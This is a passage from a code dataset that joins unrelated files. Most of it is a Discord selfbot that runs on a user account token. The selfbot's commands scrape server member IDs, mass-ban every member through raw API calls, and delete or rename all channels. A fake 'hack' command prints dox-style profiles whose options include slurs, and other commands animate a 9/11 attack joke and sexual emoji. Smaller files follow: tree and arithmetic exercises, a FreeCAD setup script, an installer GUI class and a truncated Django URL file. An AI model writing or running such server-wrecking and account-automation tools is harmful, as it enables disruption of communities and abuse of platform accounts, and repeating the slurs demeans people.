Soon...\u001B[0m\u001B[2;31m\u001B[0m\r\n```\r\n\"\"\")\r\n\r\n\r\n@tokyo.command()\r\nasync def utils(ctx):\r\n await ctx.message.delete()\r\n await ctx.send(f\"\"\"\r\n```ansi\r\n\u001B[2;34m- >copy\r\n\u001B[2;37m- Clone discord server\r\n\u001B[2;34m- >hypesquad\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Changes hypesquad badge without answering any questions\u001B[0m\r\n\u001B[2;37m\u001B[2;34m\u001B[2;37m\u001B[2;34m- >purge\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m\u001B[2;37m- Clear your messages\u001B[0m\u001B[2;37m\r\n\u001B[0m\u001B[2;34m\u001B[2;37m\u001B[2;34m- >play\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m- Get playing status\r\n\u001B[2;34m\u001B[2;37m\u001B[2;34m- >stop\u001B[0m\u001B[2;37m\u001B[0m\u001B[2;34m\r\n\u001B[0m\u001B[2;37m\u001B[2;37m- Remove playing status\u001B[0m\u001B[2;37m\r\n\u001B[0m\r\n\u001B[2;34mComing Soon...\u001B[0m\u001B[2;31m\u001B[0m\r\n``` \r\n\r\n \"\"\")\r\n\r\n\r\n@tokyo.command(aliases=['changehypesquad'])\r\nasync def hypesquad(ctx, house):\r\n await ctx.message.delete()\r\n request = requests.Session()\r\n headers = {\r\n 'Authorization':\r\n token,\r\n 'Content-Type':\r\n 'application/json',\r\n 'User-Agent':\r\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) discord/0.0.305 Chrome/69.0.3497.128 Electron/4.0.8 Safari/537.36'\r\n }\r\n if house == \"bravery\":\r\n payload = {'house_id': 1}\r\n elif house == \"brilliance\":\r\n payload = {'house_id': 2}\r\n elif house == \"balance\":\r\n payload = {'house_id': 3}\r\n elif house == \"random\":\r\n houses = [1, 2, 3]\r\n payload = {'house_id': random.choice(houses)}\r\n try:\r\n request.post('https://discordapp.com/api/v8/hypesquad/online',\r\n headers=headers,\r\n json=payload,\r\n timeout=10)\r\n except Exception as e:\r\n print(f\"{Fore.RED}[ERROR]: {Fore.YELLOW}{e}\" + Fore.RESET)\r\n\r\n@tokyo.command()\r\nasync def hack(ctx, user: discord.Member=None):\r\n await ctx.message.delete()\r\n gender = [\"Male\", \"Female\", \"Trans\", \"Other\", \"Retard\"]\r\n age = str(random.randrange(10, 25))\r\n height = ['4\\'6\\\"', '4\\'7\\\"', '4\\'8\\\"', '4\\'9\\\"', '4\\'10\\\"', '4\\'11\\\"', '5\\'0\\\"', '5\\'1\\\"', '5\\'2\\\"', '5\\'3\\\"',\r\n '5\\'4\\\"', '5\\'5\\\"',\r\n '5\\'6\\\"', '5\\'7\\\"', '5\\'8\\\"', '5\\'9\\\"', '5\\'10\\\"', '5\\'11\\\"', '6\\'0\\\"', '6\\'1\\\"', '6\\'2\\\"', '6\\'3\\\"',\r\n '6\\'4\\\"', '6\\'5\\\"',\r\n '6\\'6\\\"', '6\\'7\\\"', '6\\'8\\\"', '6\\'9\\\"', '6\\'10\\\"', '6\\'11\\\"']\r\n weight = str(random.randrange(60, 300))\r\n hair_color = [\"Black\", \"Brown\", \"Blonde\", \"White\", \"Gray\", \"Red\"]\r\n skin_color = [\"White\", \"Pale\", \"Brown\", \"Black\", \"Light-Skin\"]\r\n religion = [\"Christian\", \"Muslim\", \"Atheist\", \"Hindu\", \"Buddhist\", \"Jewish\"]\r\n sexuality = [\"Straight\", \"Gay\", \"Homo\", \"Bi\", \"Bi-Sexual\", \"Lesbian\", \"Pansexual\"]\r\n education = [\"High School\", \"College\", \"Middle School\", \"Elementary School\", \"Pre School\",\r\n \"Retard never went to school LOL\"]\r\n ethnicity = [\"White\", \"African American\", \"Asian\", \"Latino\", \"Latina\", \"American\", \"Mexican\", \"Korean\", \"Chinese\",\r\n \"Arab\", \"Italian\", \"Puerto Rican\", \"Non-Hispanic\", \"Russian\", \"Canadian\", \"European\", \"Indian\"]\r\n occupation = [\"Retard has no job LOL\", \"Certified discord retard\", \"Janitor\", \"Police Officer\", \"Teacher\",\r\n \"Cashier\", \"Clerk\", \"Waiter\", \"Waitress\", \"Grocery Bagger\", \"Retailer\", \"Sales-Person\", \"Artist\",\r\n \"Singer\", \"Rapper\", \"Trapper\", \"Discord Thug\", \"Gangster\", \"Discord Packer\", \"Mechanic\", \"Carpenter\",\r\n \"Electrician\", \"Lawyer\", \"Doctor\", \"Programmer\", \"Software Engineer\", \"Scientist\"]\r\n salary = [\"Retard makes no money LOL\", \"$\" + str(random.randrange(0, 1000)), '<$50,000', '<$75,000', \"$100,000\",\r\n \"$125,000\", \"$150,000\", \"$175,000\",\r\n \"$200,000+\"]\r\n location = [\"Retard lives in his mom's basement LOL\", \"America\", \"United States\", \"Europe\", \"Poland\", \"Mexico\",\r\n \"Russia\", \"Pakistan\", \"India\",\r\n \"Some random third world country\", \"Canada\", \"Alabama\", \"Alaska\", \"Arizona\", \"Arkansas\", \"California\",\r\n \"Colorado\", \"Connecticut\", \"Delaware\", \"Florida\", \"Georgia\", \"Hawaii\", \"Idaho\", \"Illinois\", \"Indiana\",\r\n \"Iowa\", \"Kansas\", \"Kentucky\", \"Louisiana\", \"Maine\", \"Maryland\", \"Massachusetts\", \"Michigan\",\r\n \"Minnesota\", \"Mississippi\", \"Missouri\", \"Montana\", \"Nebraska\", \"Nevada\", \"New Hampshire\", \"New Jersey\",\r\n \"New Mexico\", \"New York\", \"North Carolina\", \"North Dakota\", \"Ohio\", \"Oklahoma\", \"Oregon\",\r\n \"Pennsylvania\", \"Rhode Island\", \"South Carolina\", \"South Dakota\", \"Tennessee\", \"Texas\", \"Utah\",\r\n \"Vermont\", \"Virginia\", \"Washington\", \"West Virginia\", \"Wisconsin\", \"Wyoming\"]\r\n email = [\"@gmail.com\", \"@yahoo.com\", \"@hotmail.com\", \"@outlook.com\", \"@protonmail.com\", \"@disposablemail.com\",\r\n \"@aol.com\", \"@edu.com\", \"@icloud.com\", \"@gmx.net\", \"@yandex.com\"]\r\n dob = f'{random.randrange(1, 13)}/{random.randrange(1, 32)}/{random.randrange(1950, 2021)}'\r\n name = ['James Smith', \"Michael Smith\", \"Robert Smith\", \"Maria Garcia\", \"David Smith\", \"Maria Rodriguez\",\r\n \"Mary Smith\", \"Maria Hernandez\", \"Maria Martinez\", \"James Johnson\", \"Catherine Smoaks\", \"Cindi Emerick\",\r\n \"Trudie Peasley\", \"Josie Dowler\", \"Jefferey Amon\", \"Kyung Kernan\", \"Lola Barreiro\",\r\n \"Barabara Nuss\", \"Lien Barmore\", \"Donnell Kuhlmann\", \"Geoffrey Torre\", \"Allan Craft\",\r\n \"Elvira Lucien\", \"Jeanelle Orem\", \"Shantelle Lige\", \"Chassidy Reinhardt\", \"Adam Delange\",\r\n \"Anabel Rini\", \"Delbert Kruse\", \"Celeste Baumeister\", \"Jon Flanary\", \"Danette Uhler\", \"Xochitl Parton\",\r\n \"Derek Hetrick\", \"Chasity Hedge\", \"Antonia Gonsoulin\", \"Tod Kinkead\", \"Chastity Lazar\", \"Jazmin Aumick\",\r\n \"Janet Slusser\", \"Junita Cagle\", \"Stepanie Blandford\", \"Lang Schaff\", \"Kaila Bier\", \"Ezra Battey\",\r\n \"Bart Maddux\", \"Shiloh Raulston\", \"Carrie Kimber\", \"Zack Polite\", \"Marni Larson\", \"Justa Spear\"]\r\n phone = f'({random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)})-{random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)}-{random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)}{random.randrange(0, 10)}'\r\n if user is None:\r\n user = ctx.author\r\n password = ['password', '123', 'mypasswordispassword', user.name + \"iscool123\", user.name + \"isdaddy\",\r\n \"daddy\" + user.name, \"ilovediscord\", \"i<3discord\", \"furryporn456\", \"secret\", \"123456789\", \"apple49\",\r\n \"redskins32\", \"princess\", \"dragon\", \"password1\", \"1q2w3e4r\", \"ilovefurries\"]\r\n message = await ctx.send(f\"`Hacking {user}...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(content=f\"`Hacking {user}...\\nHacking into the mainframe...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\nBruteforcing love life details...`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\nBruteforcing love life details...\\nFinalizing life-span dox details\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"```Successfully hacked {user}\\nName: {random.choice(name)}\\nGender: {random.choice(gender)}\\nAge: {age}\\nHeight: {random.choice(height)}\\nWeight: {weight}\\nHair Color: {random.choice(hair_color)}\\nSkin Color: {random.choice(skin_color)}\\nDOB: {dob}\\nLocation: {random.choice(location)}\\nPhone: {phone}\\nE-Mail: {user.name + random.choice(email)}\\nPasswords: {random.choices(password, k=3)}\\nOccupation: {random.choice(occupation)}\\nAnnual Salary: {random.choice(salary)}\\nEthnicity: {random.choice(ethnicity)}\\nReligion: {random.choice(religion)}\\nSexuality: {random.choice(sexuality)}\\nEducation: {random.choice(education)}```\")\r\n else:\r\n password = ['password', '123', 'mypasswordispassword', user.name + \"iscool123\", user.name + \"isdaddy\",\r\n \"daddy\" + user.name, \"ilovediscord\", \"i<3discord\", \"furryporn456\", \"secret\", \"123456789\", \"apple49\",\r\n \"redskins32\", \"princess\", \"dragon\", \"password1\", \"1q2w3e4r\", \"ilovefurries\"]\r\n message = await ctx.send(f\"`Hacking {user}...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(content=f\"`Hacking {user}...\\nHacking into the mainframe...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\nBruteforcing love life details...`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"`Hacking {user}...\\nHacking into the mainframe...\\nCaching data...\\nCracking SSN information...\\nBruteforcing love life details...\\nFinalizing life-span dox details\\n`\")\r\n await asyncio.sleep(1)\r\n await message.edit(\r\n content=f\"```Successfully hacked {user}\\nName: {random.choice(name)}\\nGender: {random.choice(gender)}\\nAge: {age}\\nHeight: {random.choice(height)}\\nWeight: {weight}\\nHair Color: {random.choice(hair_color)}\\nSkin Color: {random.choice(skin_color)}\\nDOB: {dob}\\nLocation: {random.choice(location)}\\nPhone: {phone}\\nE-Mail: {user.name + random.choice(email)}\\nPasswords: {random.choices(password, k=3)}\\nOccupation: {random.choice(occupation)}\\nAnnual Salary: {random.choice(salary)}\\nEthnicity: {random.choice(ethnicity)}\\nReligion: {random.choice(religion)}\\nSexuality: {random.choice(sexuality)}\\nEducation: {random.choice(education)}```\")\r\n\r\n\r\n@tokyo.command()\r\nasync def purge(ctx, amount: int=None):\r\n await ctx.message.delete()\r\n if amount is None:\r\n await ctx.send(f'[ERROR]: Invalid input! Command: {tokyo.command_prefix}purge ')\r\n return\r\n async for message in ctx.message.channel.history(limit=amount).filter(lambda m: m.author == tokyo.user).map(\r\n lambda m: m):\r\n try:\r\n await message.delete()\r\n except:\r\n pass\r\n@tokyo.command(aliases=[\"copyguild\", \"copyserver\"])\r\nasync def copy(ctx):\r\n await ctx.message.delete()\r\n await tokyo.create_guild(f'backup-{ctx.guild.name}')\r\n await asyncio.sleep(4)\r\n for g in tokyo.guilds:\r\n if f'backup-{ctx.guild.name}' in g.name:\r\n for c in g.channels:\r\n await c.delete()\r\n for cate in ctx.guild.categories:\r\n x = await g.create_category(f\"{cate.name}\")\r\n for chann in cate.channels:\r\n if isinstance(chann, discord.VoiceChannel):\r\n await x.create_voice_channel(f\"{chann}\")\r\n if isinstance(chann, discord.TextChannel):\r\n await x.create_text_channel(f\"{chann}\")\r\n try:\r\n await g.edit(icon=ctx.guild.icon_url)\r\n except Exception as e:\r\n await ctx.send(f'[ERROR]: {e}')\r\n\r\n@tokyo.command(aliases=[\"jerkoff\", \"ejaculate\", \"orgasm\"])\r\nasync def cum(ctx):\r\n await ctx.message.delete()\r\n message = await ctx.send('''\r\n :ok_hand: :smile:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8=:punch:=D \r\n :trumpet: :eggplant:''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :smiley:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :grimacing:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8=:punch:=D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :persevere:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :confounded:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8=:punch:=D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :tired_face:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D \r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(contnet='''\r\n :ok_hand: :weary:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8=:punch:= D:sweat_drops:\r\n :trumpet: :eggplant: \r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :dizzy_face:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D :sweat_drops:\r\n :trumpet: :eggplant: :sweat_drops:\r\n ''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :ok_hand: :drooling_face:\r\n :eggplant: :zzz: :necktie: :eggplant: \r\n :oil: :nose:\r\n :zap: 8==:punch:D :sweat_drops:\r\n :trumpet: :eggplant: :sweat_drops:\r\n ''')\r\n\r\n\r\n\r\n@tokyo.command(aliases=[\"9/11\", \"911\", \"terrorist\"])\r\nasync def nine_eleven(ctx):\r\n await ctx.message.delete()\r\n invis = \"\" # char(173)\r\n message = await ctx.send(f'''\r\n{invis}:man_beard::airplane: :office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content=f'''\r\n{invis} :man_beard::airplane: :office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content=f'''\r\n{invis} :man_beard::airplane: :office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content=f'''\r\n{invis} :man_beard::airplane: :office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content=f'''\r\n{invis} :man_beard::airplane::office: \r\n''')\r\n await asyncio.sleep(0.5)\r\n await message.edit(content='''\r\n :boom::boom::boom: \r\n ''')\r\n\r\n\r\n@tokyo.command(aliases=[\"distort\"])\r\nasync def magik(ctx, user: discord.Member=None):\r\n await ctx.message.delete()\r\n endpoint = \"https://nekobot.xyz/api/imagegen?type=magik&intensity=3&image=\"\r\n if user is None:\r\n avatar = str(ctx.author.avatar_url_as(format=\"png\"))\r\n endpoint += avatar\r\n r = requests.get(endpoint)\r\n res = r.json()\r\n try:\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(str(res['message'])) as resp:\r\n image = await resp.read()\r\n with io.BytesIO(image) as file:\r\n await ctx.send(file=discord.File(file, f\"astraa_magik.png\"))\r\n except:\r\n await ctx.send(res['message'])\r\n else:\r\n avatar = str(user.avatar_url_as(format=\"png\"))\r\n endpoint += avatar\r\n r = requests.get(endpoint)\r\n res = r.json()\r\n try:\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(str(res['message'])) as resp:\r\n image = await resp.read()\r\n with io.BytesIO(image) as file:\r\n await ctx.send(file=discord.File(file, f\"astraa_magik.png\"))\r\n except:\r\n await ctx.send(res['message'])\r\n\r\n\r\n@tokyo.command(alises=[\"game\"])\r\nasync def play(ctx, *, message=None):\r\n await ctx.message.delete()\r\n if message is None:\r\n await ctx.send(f'[ERROR]: Invalid input! Command: {tokyo.command_prefix}playing ')\r\n return\r\n game = discord.Game(name=message)\r\n await tokyo.change_presence(activity=game)\r\n\r\n\r\n\r\n@tokyo.command(aliases=[\"stopstreaming\", \"stopstatus\", \"stoplistening\", \"stopplaying\", \"stopwatching\"])\r\nasync def stop(ctx):\r\n await ctx.message.delete()\r\n await tokyo.change_presence(activity=None, status=discord.Status.dnd)\r\n\r\n@tokyo.command()\r\nasync def scrape(ctx):\r\n await ctx.message.delete()\r\n mem = ctx.guild.members\r\n for member in mem:\r\n try:\r\n print(\"Scraped members.\")\r\n mfil = open(\"TOKYOSB/members.txt\",\"a\")\r\n\r\n mfil.write(str(member.id) + \"\\n\")\r\n mfil.close()\r\n\r\n except Exception as e:\r\n print(\"error\",e)\r\n\r\n@tokyo.command(aliases=['dc'])\r\nasync def deletechannels(ctx):\r\n await ctx.message.delete()\r\n print(f\"{Fore.RED}Deleting Channels . . .\")\r\n for channel in ctx.guild.channels:\r\n await channel.delete()\r\n print(f\"{Fore.RED} Channels Deleted\")\r\n\r\n\r\n@tokyo.command()\r\nasync def massban(ctx, guild):\r\n guild = guild\r\n await tokyo.wait_until_ready()\r\n guildOBJ = tokyo.get_guild(int(guild))\r\n members = await guildOBJ.chunk()\r\n try:\r\n os.remove('TOKYOSB/members.txt')\r\n except:\r\n pass\r\n\r\n membercount = 0\r\n with open('TOKYOSB/members.txt', 'a') as (m):\r\n for member in members:\r\n m.write(str(member.id) + '\\n')\r\n membercount += 1\r\n\r\n await ctx.send('TOKYO | MASS BAN INITIATED\\nRemoving Members in progress......')\r\n m.close()\r\n guild = guild\r\n print()\r\n members = open('TOKYOSB/members.txt')\r\n for member in members:\r\n while True:\r\n r = requests.put(f\"https://discord.com/api/v8/guilds/{guild}/bans/{member}\", headers=headers)\r\n if 'retry_after' in r.text:\r\n time.sleep(r.json()['retry_after'])\r\n else:\r\n if r.status_code == 200 or r.status_code == 201 or r.status_code == 204:\r\n print(f\"Banned{member.strip()}\")\r\n break\r\n else:\r\n break\r\n\r\n members.close()\r\n\r\n@tokyo.command(aliases=[\"rc\"])\r\nasync def renamechannels(ctx, *, name):\r\n \r\n for channel in ctx.guild.channels:\r\n await channel.edit(name=name)\r\n\r\n\r\n\r\nif token_type == \"user\":\r\n tokyo.run(token, bot=False)\r\nelif token_type == \"bot\":\r\n tokyo.run(token)\r\n\r\n\r\ntokyo.run(token, bot = False)\r\n","repo_name":"s3ng0n/TokyoSelfbot","sub_path":"selfbot.py","file_name":"selfbot.py","file_ext":"py","file_size_in_byte":22341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7260653741","text":"import sys\nclass Node():\n def __init__(self, v):\n self.value = v\n self.left = None\n self.right = None\n self.visit = False\n\ndef isLeaf(node):\n return not node.left and not node.right\n\ndef traverse(node, h, mh):\n h = h + 1\n if isLeaf(node):\n node.visit = True\n return min(mh, h)\n\n if node.left and not node.left.visit:\n mh = min(traverse(node.left, h, mh), mh)\n if node.right and not node.right.visit:\n mh = min(traverse(node.right, h, mh), mh)\n node.visit = True\n return mh\n\n\ndef minDepth(root):\n if isLeaf(root):\n return 1\n return traverse(root, 0, sys.maxsize)\n\nif __name__ == '__main__':\n # Driver Program\n root = Node(10)\n root.left = Node(5)\n root.left.left = Node(4)\n root.left.left.left = Node(1)\n root.right = Node(3)\n # root.left.left = Node(4)\n # root.left.right = Node(5)\n print(minDepth(root))","repo_name":"demyank88/datastructureAlgorithm","sub_path":"binarySearchTree/FindMinimunDepthOfABinaryTree/trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42232542054","text":"# ile opakowan bulek i parowek na hot-dog\n# dla podanej ilosci osob\n\n#lewis_lu 18/06/2019\n\n\nBOX_PAR = 10\nBOX_BUL = 8\n\nosoby = int(input('Podaj ilosc osob: '))\n\nbox_p = osoby % BOX_PAR\nbox_p1 = osoby // BOX_PAR\nbox_p2 = box_p1 + 1\next_p = BOX_PAR - box_p\n\nbox_b = osoby % BOX_BUL\nbox_b1 = osoby // BOX_BUL\nbox_b2 = box_b1 + 1\next_b = BOX_BUL - box_b\n\n\nif box_p > 0:\n\tprint('Potrzebujesz', box_p2,'opakowan parowek' )\nelse:\n\tprint('Potrzebujesz', box_p1, 'opakowan parowek')\n\t\nif box_b > 0:\n\tprint('Potrzebujesz', box_b2,'opakowan bulek' )\nelse:\n\tprint('Potrzebujesz', box_b1, 'opakowan bulek')\n\t\nif box_p > 0:\n\tprint('Pozostalo jeszcze', ext_p, 'parowki(-ek)')\nif box_b > 0:\n\tprint('Pozostalo jeszcze', ext_b, 'bulki(-ek)')\n","repo_name":"lewislu77/Starting_with_Python_4thEd.","sub_path":"chapter 3/ex.8_p.3.py","file_name":"ex.8_p.3.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5099483468","text":"def add_snap_pythonpath():\n import os\n import sys\n\n pythonpath = os.environ.get(\"SNAP_PYTHONPATH\")\n if pythonpath:\n print(f\"Adding snap-specific PYTHONPATH to sys.path: {pythonpath}\")\n os.environ[\"PYTHONPATH\"] = pythonpath\n for path in pythonpath.split(\":\"):\n sys.path.insert(0, path)\n\ndef configure_mod_raytracing():\n import FreeCAD\n param = FreeCAD.ParamGet(\"User parameter:BaseApp/Preferences/Mod/Raytracing\")\n if not param.GetString(\"PovrayExecutable\", \"\"):\n param.SetString(\"PovrayExecutable\", \"/snap/freecad/current/usr/bin/povray\")\n\ndef configure_mod_mesh():\n import FreeCAD\n param = FreeCAD.ParamGet(\"User parameter:BaseApp/Preferences/Mod/Mesh/Meshing\")\n if not param.GetString(\"gmshExe\", \"\"):\n param.SetString(\"gmshExe\", \"/snap/freecad/current/usr/bin/gmsh\")\n\ndef fix_theme():\n import FreeCAD\n param = FreeCAD.ParamGet(\"User parameter:BaseApp/Preferences/Bitmaps/Theme\")\n if param.GetBool(\"ThemeSearchPaths\", False) != param.GetBool(\"ThemeSearchPaths\", True):\n param.SetBool(\"ThemeSearchPaths\", False)\n\nadd_snap_pythonpath()\nconfigure_mod_raytracing()\nconfigure_mod_mesh()\nfix_theme()\n","repo_name":"realthunder/FreeCADMakeImage","sub_path":"snap/local/snap-setup-mod/Init.py","file_name":"Init.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"78"} +{"seq_id":"3031193646","text":"#!/usr/bin/env python\n# coding: utf-8\n# библиотеки\nimport numpy as np\n# входные данные\nx = int(input()) #количество наборов входных данных\nfor i in range(x):\n N,K = map(int, input().split())\n sectors = np.array(list(map(int, input().split())))\n sums = []\n sectors= np.concatenate((sectors[K+1:],sectors[0:K]))\n length=len(sectors)\n for i in range(length):\n for j in range(length):\n if i==j:\n sums.append(sectors[i])\n else:\n sums.append(sectors[i:j+1].sum())\n print(max(sums))\n \n#8 2\n#2 3 4 5 -30 6 -1 2\n \n#6 -1\n#1 -3 2 -2 3 4","repo_name":"masanya99/school-applies","sub_path":"MADE/TEST.py","file_name":"TEST.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21214993638","text":"from os.path import join\nfrom PyQt4 import QtGui\nfrom PyQt4.QtCore import *\n\nimport gettext\n__trans = gettext.translation('yali4', fallback=True)\n_ = __trans.ugettext\n\nimport yali4.sysutils\nfrom yali4.gui.Ui.main import Ui_YaliMain\nimport yali4.gui.context as ctx\n\n# Aspect oriented huh ;)\nfrom pyaspects.weaver import *\nfrom yali4.gui.aspects import *\n\n# Release Notes\nimport GUIRelNotes\n\n##\n# Widget for YaliWindow (you can call it MainWindow too ;).\nclass Widget(Ui_YaliMain):\n def __init__(self):\n self.ui = QtGui.QWidget()\n self.setupUi(self.ui)\n self.screenData = None\n # shortcut to open debug window\n self.debugShortCut = QtGui.QShortcut(QtGui.QKeySequence(Qt.Key_F2),self.ui)\n self.ui.setAttribute(Qt.WA_OpaquePaintEvent)\n # move one step at a time\n self.moveInc = 1\n\n # Dont need help as default\n self.slotToggleHelp()\n\n # Main Slots\n QObject.connect(self.debugShortCut, SIGNAL(\"activated()\"), self.toggleDebug)\n QObject.connect(self.buttonNext, SIGNAL(\"clicked()\"), self.slotNext)\n QObject.connect(self.buttonBack, SIGNAL(\"clicked()\"), self.slotBack)\n QObject.connect(self.toggleHelp, SIGNAL(\"clicked()\"), self.slotToggleHelp)\n QObject.connect(self.releaseNotes, SIGNAL(\"clicked()\"), self.showReleaseNotes)\n\n # show/hide help text\n def slotToggleHelp(self):\n if self.helpContent.isVisible():\n self.helpContent.hide()\n else:\n self.helpContent.show()\n\n # show/hide debug window\n def toggleDebug(self):\n if ctx.debugger.isVisible():\n ctx.debugger.hideWindow()\n else:\n ctx.debugger.showWindow()\n\n # returns the id of current stack\n def getCur(self, d):\n new = self.mainStack.currentIndex() + d\n total = self.mainStack.count()\n if new < 0: new = 0\n if new > total: new = total\n return new\n\n # move to id numbered step\n def setCurrent(self, id=None):\n if id:\n self.stackMove(id)\n\n # execute next step\n def slotNext(self, dryRun=False):\n if not dryRun:\n _w = self.mainStack.currentWidget()\n _w.execute()\n self.stackMove(self.getCur(self.moveInc))\n self.moveInc = 1\n\n # execute previous step\n def slotBack(self):\n _w = self.mainStack.currentWidget()\n _w.backCheck()\n self.stackMove(self.getCur(self.moveInc * -1))\n self.moveInc = 1\n\n # move to id numbered stack\n def stackMove(self, id):\n self.mainStack.setCurrentIndex(id)\n _w = self.mainStack.currentWidget()\n self.screenName.setText(_w.title)\n self.screenDescription.setText(_w.desc)\n self.screenIcon.setPixmap(QtGui.QPixmap(\":/gui/pics/%s.png\" % (_w.icon or \"pardus\")))\n self.helpContent.setText(_w.help)\n # shown functions contain necessary instructions before\n # showing a stack ( updating gui, disabling some buttons etc. )\n _w.shown()\n\n # create all widgets and add inside stack\n # see runner.py/_all_screens for the list\n def createWidgets(self, screens=[]):\n if not self.screenData:\n self.screenData = screens\n self.mainStack.removeWidget(self.page)\n for screen in screens:\n _scr = screen.Widget()\n\n if ctx.options.debug == True or yali4.sysutils.checkYaliParams(param=\"debug\"):\n # debug all screens.\n weave_all_object_methods(ctx.debugger.aspect, _scr)\n\n # enable navigation buttons before shown\n weave_object_method(enableNavButtonsAspect, _scr, \"shown\")\n # disable navigation buttons before the execute.\n weave_object_method(disableNavButtonsAspect, _scr, \"execute\")\n\n self.mainStack.addWidget(_scr)\n\n weave_all_object_methods(ctx.debugger.aspect, self)\n self.stackMove(0)\n\n # Enable/Disable buttons\n def disableNext(self):\n self.buttonNext.setEnabled(False)\n\n def disableBack(self):\n self.buttonBack.setEnabled(False)\n\n def enableNext(self):\n self.buttonNext.setEnabled(True)\n\n def enableBack(self):\n self.buttonBack.setEnabled(True)\n\n def isNextEnabled(self):\n return self.buttonNext.isEnabled()\n\n def isBackEnabled(self):\n return self.buttonBack.isEnabled()\n\n # processEvents\n def processEvents(self):\n QObject.emit(self.ui,SIGNAL(\"signalProcessEvents\"))\n\n def showReleaseNotes(self):\n # make a release notes dialog\n r = GUIRelNotes.Widget(self.ui)\n d = Dialog(_('Release Notes'), r, self)\n d.resize(500,400)\n d.exec_()\n\n","repo_name":"pisilinux/uludag","sub_path":"branches/yali/raid/yali4/gui/YaliWindow.py","file_name":"YaliWindow.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"2567542493","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import path\nfrom rest_framework.routers import DefaultRouter\nfrom .views import (UserAPIView,\n CreateTokenView,\n AgentAPIView,\n AddWishlistView,\n AdsInUserWishListView,\n AdsInUserWishListDetailView, AgentInfoViewSet)\n\nrouter = DefaultRouter()\n# router.register(r'users', CustomUserViewSet, basename='user')\nrouter.register(r'agents', AgentInfoViewSet, basename='agents')\n\nurlpatterns = [\n path('register/', UserAPIView.as_view(), name='create-user'),\n path('become-agent/', AgentAPIView.as_view(), name='create-agent'),\n path('login/', CreateTokenView.as_view(), name='token'),\n path('add-wishlist//', AddWishlistView.as_view(), 